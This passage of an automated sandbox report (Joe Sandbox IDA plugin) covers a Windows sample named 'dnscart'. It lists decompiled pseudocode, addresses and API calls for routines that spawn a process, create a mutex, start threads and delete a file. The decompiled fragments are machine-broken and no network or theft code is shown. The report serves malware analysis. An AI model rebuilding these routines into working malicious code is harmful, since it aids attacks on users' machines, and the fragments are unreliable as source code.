							_t54 = _t75;
							_t75 = _t75 >> 7;
							 *_t98 = _t54 | 0x00000080;
							_t98 =  &(_t98[1]);
						} while (_t75 > 0x7f);
					}
					 *_t98 = _t75 & 0x0000007f;
					_t99 =  &(_t98[1]);
					memcpy(_t99, _t82, _t67);
					_t100 = _t99 + _t67;
					 *_t100 = 0x3a;
					_t101 = _t100 + 1;
					_t83 = _t84[0x28];
					_t77 = _t83;
					_t86 = _t84[0x24];
					if(_t83 > 0x7f) {
						do {
							_t52 = _t77;
							_t77 = _t77 >> 7;
							 *_t101 = _t52 | 0x00000080;
							_t101 =  &(_t101[1]);
						} while (_t77 > 0x7f);
					}
					 *_t101 = _t77 & 0x0000007f;
					memcpy( &(_t101[1]), _t86, _t83);
					_t63 =  *((intOrPtr*)(_t103 - 0xc));
				}
				return 0 |  *_t63 != 0x00000000;
			}

0x001fa037
0x001fa037
0x001fa037
0x001fa037
0x001fa037
0x001fa03a
0x001fa040
0x001fa040
0x001fa043
0x001fa044
0x001fa040
0x001fa049
0x001fa04c
0x001fa056
0x001fa060
0x001fa063
0x001fa066
0x001fa07f
0x001fa089
0x001fa08e
0x001fa09e
0x001fa0a0
0x001fa0a4
0x001fa0aa
0x001fa0ad
0x001fa0ae
0x001fa0b3
0x001fa0b5
0x001fa0b7
0x001fa0bc
0x001fa0be
0x001fa0bf
0x001fa0c7
0x001fa0c9
0x001fa0cd
0x001fa0d0
0x001fa0d3
0x001fa0d5
0x001fa0db
0x001fa0e0
0x001fa0e0
0x001fa0e2
0x001fa0e7
0x001fa0e9
0x001fa0ea
0x001fa0e0
0x001fa0f3
0x001fa0f5
0x001fa0f8
0x001fa0fe
0x001fa103
0x001fa109
0x001fa10c
0x001fa113
0x001fa116
0x001fa11a
0x001fa11d
0x001fa120
0x001fa122
0x001fa128
0x001fa130
0x001fa130
0x001fa132
0x001fa137
0x001fa139
0x001fa13a
0x001fa130
0x001fa143
0x001fa145
0x001fa148
0x001fa14e
0x001fa153
0x001fa156
0x001fa157
0x001fa15a
0x001fa15c
0x001fa162
0x001fa164
0x001fa164
0x001fa166
0x001fa16b
0x001fa16d
0x001fa16e
0x001fa164
0x001fa177
0x001fa179
0x001fa17c
0x001fa182
0x001fa187
0x001fa18a
0x001fa18b
0x001fa18e
0x001fa190
0x001fa196
0x001fa198
0x001fa198
0x001fa19a
0x001fa19f
0x001fa1a1
0x001fa1a2
0x001fa198
0x001fa1ab
0x001fa1b0
0x001fa1b6
0x001fa1b9
0x001fa1c9

APIs

GetProcessHeap.KERNEL32(00000000,00000001), ref: 001FA091
RtlAllocateHeap.NTDLL(00000000), ref: 001FA098
memcpy.NTDLL(00000000,00000001,?), ref: 001FA0F8
memcpy.NTDLL(-0000000A,?,?), ref: 001FA148
memcpy.NTDLL(-00000008,?,?), ref: 001FA17C
memcpy.NTDLL(-00000006,?,?), ref: 001FA1B0

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F90BE, Relevance: 9.1, APIs: 6, Instructions: 57

APIs

memset.NTDLL ref: 001F90C6
_snwprintf.NTDLL ref: 001F90F5
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9100
HeapFree.KERNEL32(00000000), ref: 001F9107
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 001F9116
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001F9128

Part of subcall function 001FA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001FA7B8
Part of subcall function 001FA7A0: CloseHandle.KERNEL32(?), ref: 001FA7CC
Part of subcall function 001FA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001F8F95), ref: 001FA7D5
Part of subcall function 001FA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001FA7DC

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F9990, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
process

C-Code - Quality: 25%

			E001F9990() {
				int _t10;
				void* _t12;

				memset();
				 *(_t12 - 0x88) = 0x44;
				 *((intOrPtr*)(_t12 - 0x5c)) = 0x80;
				_t10 = CreateProcessW(0x1fc7c0, 0, 0, 0, 0, 0, 0, 0, _t12 - 0x88, _t12 - 0x30);
				if(_t10 != 0) {
					CloseHandle( *(_t12 - 0x30));
					_t10 = CloseHandle( *(_t12 - 0x2c));
				}
				goto 0x331bae;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				return _t10;
			}

0x001f9990
0x001f9999
0x001f99a6
0x001f99c8
0x001f99d0
0x001f99d5
0x001f99de
0x001f99de
0x001f99e4
0x001f99e9
0x001f99ea
0x001f99eb
0x001f99ec
0x001f99ed
0x001f99ee
0x001f99ef

APIs

memset.NTDLL ref: 001F9990
CreateProcessW.KERNEL32(001FC7C0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001F99C8
CloseHandle.KERNEL32(?), ref: 001F99D5
CloseHandle.KERNEL32(?), ref: 001F99DE

Strings

D, xrefs: 001F9999

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F2447, Relevance: 7.6, APIs: 5, Instructions: 58

APIs

GetProcessHeap.KERNEL32(?,?), ref: 001F2452
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001F2459
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 001F2497
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 001F253A
HeapFree.KERNEL32(00000000), ref: 001F2541

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F86C5, Relevance: 7.5, APIs: 6, Instructions: 20

C-Code - Quality: 21%

			E001F86C5(intOrPtr* __edi) {
				void* _t24;
				void* _t26;

				HeapFree(GetProcessHeap(), ??, ??);
				 *0x1fc260( *((intOrPtr*)(_t26 - 0x30)));
				 *0x1fc260( *((intOrPtr*)(_t26 - 0x34)));
				 *0x1fc260( *((intOrPtr*)(_t26 - 0x38)));
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t24);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *__edi != 0x00000000;
			}

0x001f86cc
0x001f86d5
0x001f86de
0x001f86e7
0x001f86f8
0x001f8708
0x001f871a
0x001f872c
0x001f873f

APIs

GetProcessHeap.KERNEL32 ref: 001F86C5
HeapFree.KERNEL32(00000000), ref: 001F86CC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F86F1
HeapFree.KERNEL32(00000000), ref: 001F86F8
GetProcessHeap.KERNEL32(00000000,?), ref: 001F8701
HeapFree.KERNEL32(00000000), ref: 001F8708

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F259B, Relevance: 6.1, APIs: 4, Instructions: 66

APIs

RtlAllocateHeap.NTDLL ref: 001F25A4
memcpy.NTDLL(?,?), ref: 001F25DE
GetProcessHeap.KERNEL32(00000000), ref: 001F263C
HeapFree.KERNEL32(00000000), ref: 001F2643

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F8A5E, Relevance: 6.1, APIs: 4, Instructions: 60

C-Code - Quality: 35%

			E001F8A5E(void* __ecx, void* __edx, void* __edi, signed char __esi, void* __eflags) {
				void* _t19;
				intOrPtr _t20;
				signed char _t25;
				void* _t27;
				intOrPtr _t31;
				void* _t32;
				void _t34;
				signed char _t35;
				signed char _t38;
				signed int _t43;
				intOrPtr _t46;
				signed char _t47;
				void* _t48;

				L0:
				while(1) {
					L0:
					_t47 = __esi;
					_t45 = __edi;
					_t20 = L001F1F70(_t19, __ecx, __edx);
					 *((intOrPtr*)(__edi + 8)) = _t20;
					if(_t20 == 0) {
						goto L17;
					}
					L11:
					_t31 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
					 *((intOrPtr*)(__edi + 0xc)) = _t31;
					if(_t31 == 0) {
						L15:
						goto 0x3317a5;
						asm("int3");
						asm("int3");
						_push( *((intOrPtr*)(_t45 + 8)));
						L16:
						asm("adc eax, 0x1fc178");
						goto L17;
					} else {
						L12:
						goto 0x331789;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("stosd");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						L13:
						_t32 = CreateThread();
						 *(__edi + 0x10) = _t32;
						if(_t32 == 0) {
							goto L15;
						} else {
							L14:
							 *((intOrPtr*)(__edi + 4)) =  *((intOrPtr*)(_t48 - 0x18));
							_t34 =  *0x1fc274; // 0x0
							 *__edi = _t34;
							 *0x1fc274 = __edi;
							do {
								L1:
								_t46 =  *((intOrPtr*)(_t48 - 4));
								L2:
								_t43 = 0;
								_t38 = 0;
								 *(_t48 - 8) = 0;
								_t35 = 0x80;
								if(_t47 < _t46) {
									while(1) {
										L3:
										_t35 =  *_t47;
										_t47 = _t47 + 1;
										_t43 = _t43 | (_t35 & 0x7f) << _t38;
										if(_t35 >= 0) {
											break;
										}
										L4:
										_t38 = _t38 + 7;
										if(_t47 < _t46) {
											continue;
										}
										break;
									}
									L5:
									 *(_t48 - 8) = _t43;
								}
								L6:
								_t25 =  !((_t35 & 0x000000ff) >> 7);
								if((_t25 & 0x00000001) != 0) {
									L7:
									_t25 = _t43 + _t47;
									if(_t25 <= _t46) {
										L8:
										 *(_t48 - 0xc) = _t47;
										_t47 = _t25;
										_t25 = L001F8800(_t48 - 0xc, _t48 - 0x18);
										if(_t25 != 0) {
											goto L9;
										}
									}
								}
								L18:
								goto 0x3317ba;
								asm("int3");
								return _t25;
								L9:
								_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
								_t45 = _t27;
							} while (_t27 == 0);
							goto 0x331775;
							asm("int3");
							continue;
						}
					}
					L19:
					L17:
					HeapFree(GetProcessHeap(), 0, _t45);
					goto L1;
				}
			}

0x001f8a5e
0x001f8a5e
0x001f8a5e
0x001f8a5e
0x001f8a5e
0x001f8a5e
0x001f8a63
0x001f8a68
0x00000000
0x00000000
0x001f8a6a
0x001f8a71
0x001f8a73
0x001f8a76
0x001f8aab
0x001f8aab
0x001f8ab0
0x001f8ab1
0x001f8ab2
0x001f8ab4
0x001f8ab6
0x00000000
0x001f8a78
0x001f8a78
0x001f8a78
0x001f8a7d
0x001f8a7e
0x001f8a7f
0x001f8a80
0x001f8a81
0x001f8a82
0x001f8a83
0x001f8a84
0x001f8a85
0x001f8a86
0x001f8a86
0x001f8a8c
0x001f8a91
0x00000000
0x001f8a93
0x001f8a93
0x001f8a96
0x001f8a99
0x001f8a9e
0x001f8aa0
0x001f89e3
0x001f89e3
0x001f89e3
0x001f89e6
0x001f89e6
0x001f89e8
0x001f89ea
0x001f89ed
0x001f89f1
0x001f89f3
0x001f89f3
0x001f89f3
0x001f89f5
0x001f89fe
0x001f8a02
0x00000000
0x00000000
0x001f8a04
0x001f8a04
0x001f8a09
0x00000000
0x00000000
0x00000000
0x001f8a09
0x001f8a0b
0x001f8a0b
0x001f8a0b
0x001f8a0e
0x001f8a14
0x001f8a18
0x001f8a1e
0x001f8a1e
0x001f8a23
0x001f8a29
0x001f8a29
0x001f8a32
0x001f8a34
0x001f8a3b
0x00000000
0x00000000
0x001f8a3b
0x001f8a23
0x001f8ad0
0x001f8ad0
0x001f8ad5
0x001f8ad6
0x001f8a41
0x001f8a4c
0x001f8a52
0x001f8a54
0x001f8a58
0x001f8a5d
0x00000000
0x001f8a5d
0x001f8a91
0x00000000
0x001f8abb
0x001f8ac5
0x00000000
0x001f8ac5

APIs

GetProcessHeap.KERNEL32(00000008,00000014), ref: 001F8A45
RtlAllocateHeap.NTDLL(00000000), ref: 001F8A4C
GetProcessHeap.KERNEL32(00000000), ref: 001F8ABE
HeapFree.KERNEL32(00000000), ref: 001F8AC5

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F1EB9, Relevance: 6.1, APIs: 4, Instructions: 55

APIs

GetProcessHeap.KERNEL32 ref: 001F1EB9
RtlAllocateHeap.NTDLL(00000000), ref: 001F1EC0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F1F2B
HeapFree.KERNEL32(00000000), ref: 001F1F32

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F8AB4, Relevance: 6.1, APIs: 4, Instructions: 51

C-Code - Quality: 43%

			E001F8AB4(void* __ebx, void* __edi, signed char __esi) {
				signed char _t21;
				intOrPtr _t27;
				intOrPtr _t30;
				void* _t31;
				void _t33;
				signed char _t36;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				void* _t45;
				signed char _t46;
				void* _t47;

				L0:
				while(1) {
					L0:
					_t46 = __esi;
					asm("adc eax, 0x1fc178");
					while(1) {
						L17:
						HeapFree(GetProcessHeap(), 0, _t45);
						while(1) {
							L1:
							_t44 =  *((intOrPtr*)(_t47 - 4));
							L2:
							_t41 = 0;
							_t37 = 0;
							 *(_t47 - 8) = 0;
							_t36 = 0x80;
							if(_t46 < _t44) {
								while(1) {
									L3:
									_t36 =  *_t46;
									_t46 = _t46 + 1;
									_t41 = _t41 | (_t36 & 0x7f) << _t37;
									if(_t36 >= 0) {
										break;
									}
									L4:
									_t37 = _t37 + 7;
									if(_t46 < _t44) {
										continue;
									}
									break;
								}
								L5:
								 *(_t47 - 8) = _t41;
							}
							L6:
							_t21 =  !((_t36 & 0x000000ff) >> 7);
							if((_t21 & 0x00000001) != 0) {
								L7:
								_t21 = _t41 + _t46;
								if(_t21 <= _t44) {
									L8:
									 *(_t47 - 0xc) = _t46;
									_t42 = _t47 - 0x18;
									_t38 = _t47 - 0xc;
									_t46 = _t21;
									_t21 = L001F8800(_t47 - 0xc, _t47 - 0x18);
									if(_t21 != 0) {
										L9:
										_t45 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
										if(_t45 == 0) {
											L1:
											_t44 =  *((intOrPtr*)(_t47 - 4));
											goto L2;
										} else {
											L10:
											goto 0x331775;
											asm("int3");
											L11:
											_t27 = L001F1F70(_t23, _t38, _t42);
											 *((intOrPtr*)(_t45 + 8)) = _t27;
											if(_t27 == 0) {
												L17:
												HeapFree(GetProcessHeap(), 0, _t45);
												continue;
											} else {
												L12:
												_t30 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
												 *((intOrPtr*)(_t45 + 0xc)) = _t30;
												if(_t30 == 0) {
													L16:
													goto 0x3317a5;
													asm("int3");
													asm("int3");
													_push( *((intOrPtr*)(_t45 + 8)));
													goto L0;
												} else {
													L13:
													goto 0x331789;
													asm("int3");
													asm("int3");
													asm("int3");
													asm("stosd");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													L14:
													_t31 = CreateThread();
													 *(_t45 + 0x10) = _t31;
													if(_t31 == 0) {
														goto L16;
													} else {
														L15:
														 *((intOrPtr*)(_t45 + 4)) =  *((intOrPtr*)(_t47 - 0x18));
														_t33 =  *0x1fc274; // 0x0
														 *_t45 = _t33;
														 *0x1fc274 = _t45;
														do {
															goto L1;
														} while (_t45 == 0);
														goto L10;
													}
												}
											}
										}
										L19:
									}
								}
							}
							L18:
							goto 0x3317ba;
							asm("int3");
							return _t21;
						}
					}
				}
			}

0x001f8ab4
0x001f8ab4
0x001f8ab4
0x001f8ab4
0x001f8ab6
0x001f8abb
0x001f8abb
0x001f8ac5
0x001f89e3
0x001f89e3
0x001f89e3
0x001f89e6
0x001f89e6
0x001f89e8
0x001f89ea
0x001f89ed
0x001f89f1
0x001f89f3
0x001f89f3
0x001f89f3
0x001f89f5
0x001f89fe
0x001f8a02
0x00000000
0x00000000
0x001f8a04
0x001f8a04
0x001f8a09
0x00000000
0x00000000
0x00000000
0x001f8a09
0x001f8a0b
0x001f8a0b
0x001f8a0b
0x001f8a0e
0x001f8a14
0x001f8a18
0x001f8a1e
0x001f8a1e
0x001f8a23
0x001f8a29
0x001f8a29
0x001f8a2c
0x001f8a2f
0x001f8a32
0x001f8a34
0x001f8a3b
0x001f8a41
0x001f8a52
0x001f8a56
0x001f89e3
0x001f89e3
0x00000000
0x001f8a58
0x001f8a58
0x001f8a58
0x001f8a5d
0x001f8a5e
0x001f8a5e
0x001f8a63
0x001f8a68
0x001f8abb
0x001f8ac5
0x00000000
0x001f8a6a
0x001f8a6a
0x001f8a71
0x001f8a73
0x001f8a76
0x001f8aab
0x001f8aab
0x001f8ab0
0x001f8ab1
0x001f8ab2
0x00000000
0x001f8a78
0x001f8a78
0x001f8a78
0x001f8a7d
0x001f8a7e
0x001f8a7f
0x001f8a80
0x001f8a81
0x001f8a82
0x001f8a83
0x001f8a84
0x001f8a85
0x001f8a86
0x001f8a86
0x001f8a8c
0x001f8a91
0x00000000
0x001f8a93
0x001f8a93
0x001f8a96
0x001f8a99
0x001f8a9e
0x001f8aa0
0x001f89e3
0x00000000
0x00000000
0x00000000
0x001f89e3
0x001f8a91
0x001f8a76
0x001f8a68
0x00000000
0x001f8a56
0x001f8a3b
0x001f8a23
0x001f8ad0
0x001f8ad0
0x001f8ad5
0x001f8ad6
0x001f8ad6
0x001f89e3
0x001f8abb

APIs

GetProcessHeap.KERNEL32(00000008,00000014), ref: 001F8A45
RtlAllocateHeap.NTDLL(00000000), ref: 001F8A4C
GetProcessHeap.KERNEL32(00000000), ref: 001F8ABE
HeapFree.KERNEL32(00000000), ref: 001F8AC5

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F9370, Relevance: 6.0, APIs: 4, Instructions: 40string

APIs

GetModuleFileNameW.KERNEL32(00000000,001FC9C8,00000104), ref: 001F938C
GetProcessHeap.KERNEL32(00000008,0000015C), ref: 001F93C6
RtlAllocateHeap.NTDLL(00000000), ref: 001F93CD
lstrlen.KERNEL32(?), ref: 001F93F4

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F850C, Relevance: 6.0, APIs: 4, Instructions: 32

C-Code - Quality: 76%

			E001F850C(intOrPtr __ecx, void* __edx, long* __edi) {
				void* _t4;
				void* _t9;
				void* _t17;
				void* _t19;

				_t9 = __edx;
				 *((intOrPtr*)(_t19 - 4)) = __ecx;
				_t4 = RtlAllocateHeap(GetProcessHeap(), 0,  *__edi);
				_t17 = _t4;
				if(_t17 == 0) {
					L4:
					goto 0x3315de;
					asm("int3");
					return _t4;
				} else {
					_push(_t9);
					_push( *((intOrPtr*)(_t19 - 4)));
					if(L001F2DB0(_t17, __edi) == 0) {
						_t4 = _t17;
						goto L4;
					} else {
						HeapFree(GetProcessHeap(), 0, _t17);
						return 0;
					}
				}
			}

0x001f850c
0x001f850e
0x001f851c
0x001f8522
0x001f8526
0x001f8557
0x001f8557
0x001f855c
0x001f855d
0x001f8528
0x001f8528
0x001f8529
0x001f853a
0x001f8555
0x00000000
0x001f853c
0x001f8546
0x001f8554
0x001f8554
0x001f853a

APIs

GetProcessHeap.KERNEL32(00000000), ref: 001F8515
RtlAllocateHeap.NTDLL(00000000), ref: 001F851C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F853F
HeapFree.KERNEL32(00000000), ref: 001F8546

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001FA7A0, Relevance: 6.0, APIs: 4, Instructions: 31

C-Code - Quality: 100%

			E001FA7A0(long __ecx) {
				int _t3;
				long _t7;
				void* _t9;
				void* _t10;

				_t10 =  *0x1fcbd4; // 0x0
				_t7 = __ecx;
				_t9 = 0x1fcbd4;
				while(_t10 != 0) {
					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
					if(_t3 == 0x102) {
						_t9 = _t10;
					} else {
						 *_t9 =  *_t10;
						CloseHandle( *(_t10 + 8));
						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
					}
					_t10 =  *_t9;
				}
				return _t3;
			}

0x001fa7a2
0x001fa7a8
0x001fa7ab
0x001fa7b2
0x001fa7b8
0x001fa7c3
0x001fa7e4
0x001fa7c5
0x001fa7c7
0x001fa7cc
0x001fa7dc
0x001fa7dc
0x001fa7e6
0x001fa7e8
0x001fa7ef

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 001FA7B8
CloseHandle.KERNEL32(?), ref: 001FA7CC
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001F8F95), ref: 001FA7D5
HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001FA7DC

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F198D, Relevance: 6.0, APIs: 4, Instructions: 22

C-Code - Quality: 75%

			E001F198D() {
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t15;

				L001F1830(_t11, _t12);
				_t13 =  *(_t15 - 4);
				 *0x1fc20c(_t15 - 0x20c, 0x104, _t13, 0x1fc7c0, _t13);
				HeapFree(GetProcessHeap(), 0, _t13);
				return DeleteFileW(_t15 - 0x20c);
			}

0x001f198d
0x001f1992
0x001f19a8
0x001f19bb
0x001f19d2

APIs

_snwprintf.NTDLL ref: 001F19A8
GetProcessHeap.KERNEL32(00000000,?), ref: 001F19B4
HeapFree.KERNEL32(00000000), ref: 001F19BB
DeleteFileW.KERNEL32(?), ref: 001F19C8

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F891E, Relevance: 5.0, APIs: 4, Instructions: 23

C-Code - Quality: 73%

			E001F891E(unsigned char* __eax, long __ebx, void* __edi, void* __esi) {
				long _t10;
				long _t12;
				void* _t14;
				void* _t17;

				L0:
				while(1) {
					L0:
					_t14 = __edi;
					_t12 = __ebx;
					 *__eax =  *__eax >> 1;
					 *__eax =  *__eax;
					VirtualFree( *(__esi + 8), 0, ??);
					CloseHandle( *(__esi + 0x10));
					 *__edi =  *__esi;
					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
					while(1) {
						L4:
						_t17 =  *_t14;
						if(_t17 == 0) {
							break;
						}
						L1:
						_t10 = WaitForSingleObject( *(_t17 + 0x10), _t12);
						if(_t10 == 0x102) {
							L3:
							_t14 = _t17;
						} else {
							L2:
							goto 0x331734;
							asm("int3");
							asm("int3");
							_push( *((intOrPtr*)(_t17 + 8)));
							goto L0;
						}
					}
					L5:
					return _t10;
					L6:
				}
			}

0x001f891e
0x001f891e
0x001f891e
0x001f891e
0x001f891e
0x001f8920
0x001f8923
0x001f892b
0x001f8934
0x001f893f
0x001f8948
0x001f8952
0x001f8952
0x001f8952
0x001f8956
0x00000000
0x00000000
0x001f8904
0x001f8908
0x001f8913
0x001f8950
0x001f8950
0x001f8915
0x001f8915
0x001f8915
0x001f891a
0x001f891b
0x001f891c
0x00000000
0x001f891c
0x001f8913
0x001f8958
0x001f895b
0x00000000
0x001f895b

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 001F8908
VirtualFree.KERNEL32(?,00000000), ref: 001F892B
CloseHandle.KERNEL32(?), ref: 001F8934
GetProcessHeap.KERNEL32(00000000), ref: 001F8941
HeapFree.KERNEL32(00000000), ref: 001F8948

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F8B2C, Relevance: 5.0, APIs: 4, Instructions: 22

C-Code - Quality: 73%

			E001F8B2C(unsigned char* __eax, void* __ebx, void* __edi, void* __esi) {
				long _t10;
				void* _t13;
				void* _t16;

				L0:
				while(1) {
					L0:
					_t13 = __edi;
					 *__eax =  *__eax >> 1;
					 *__eax =  *__eax;
					VirtualFree( *(__esi + 8), 0, ??);
					CloseHandle( *(__esi + 0x10));
					 *__edi =  *__esi;
					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
					while(1) {
						L4:
						_t16 =  *_t13;
						if(_t16 == 0) {
							break;
						}
						L1:
						_t10 = WaitForSingleObject( *(_t16 + 0x10), 0xffffffff);
						if(_t10 == 0x102) {
							L3:
							_t13 = _t16;
						} else {
							L2:
							goto 0x3317f6;
							asm("int3");
							asm("int3");
							_push( *((intOrPtr*)(_t16 + 8)));
							goto L0;
						}
					}
					L5:
					return _t10;
					L6:
				}
			}

0x001f8b2c
0x001f8b2c
0x001f8b2c
0x001f8b2c
0x001f8b2e
0x001f8b31
0x001f8b39
0x001f8b42
0x001f8b4d
0x001f8b56
0x001f8b60
0x001f8b60
0x001f8b60
0x001f8b64
0x00000000
0x00000000
0x001f8b11
0x001f8b16
0x001f8b21
0x001f8b5e
0x001f8b5e
0x001f8b23
0x001f8b23
0x001f8b23
0x001f8b28
0x001f8b29
0x001f8b2a
0x00000000
0x001f8b2a
0x001f8b21
0x001f8b66
0x001f8b68
0x00000000
0x001f8b68

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001F8B16
VirtualFree.KERNEL32(?,00000000), ref: 001F8B39
CloseHandle.KERNEL32(?), ref: 001F8B42
GetProcessHeap.KERNEL32(00000000), ref: 001F8B4F
